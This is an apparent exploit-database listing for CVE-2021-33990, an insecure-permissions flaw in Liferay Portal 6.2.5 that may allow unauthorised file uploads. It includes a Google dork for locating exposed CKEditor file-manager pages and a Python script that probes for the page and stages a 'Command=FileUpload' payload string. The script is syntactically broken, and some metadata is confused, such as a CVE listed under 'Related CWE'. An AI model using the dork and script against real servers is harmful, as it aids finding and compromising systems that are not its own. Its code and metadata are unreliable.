Liferay Portal 6.2.5 - Insecure Permissions

vendor:

Liferay Portal

by:

fu2x2000

9.8

CVSS

CRITICAL

Insecure Permissions

264

CWE

Product Name: Liferay Portal

Affected Version From: Liferay Portal 6.2.5

Affected Version To: Liferay Portal 6.2.5 or later

Patch Exists: NO

Related CWE: CVE-2021-33990

CPE: a:liferay:liferay_portal:6.2.5

Metasploit:

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=62383

Platforms Tested:

2021

Liferay Portal 6.2.5 – Insecure Permissions

An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. This can allow the attacker to upload malicious files to the server, which can be used to gain access to the server.

Mitigation:

Restrict access and user groups

Source

Exploit-DB raw data:

# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990

 import requests
import json

print (" Search this on Google #Dork for liferay
-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")

url ="URL Goes Here
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
req = requests.get(url)
print req
sta = req.status_code
if sta == 200:
print ('Life Vulnerability exists')
cook = url
print cook
inject = "Command=FileUpload&Type=File&CurrentFolder=/"
#cook_inject = cook+inject
#print cook_inject
else:
print ('not found try a another method')


print ("solution restrict access and user groups")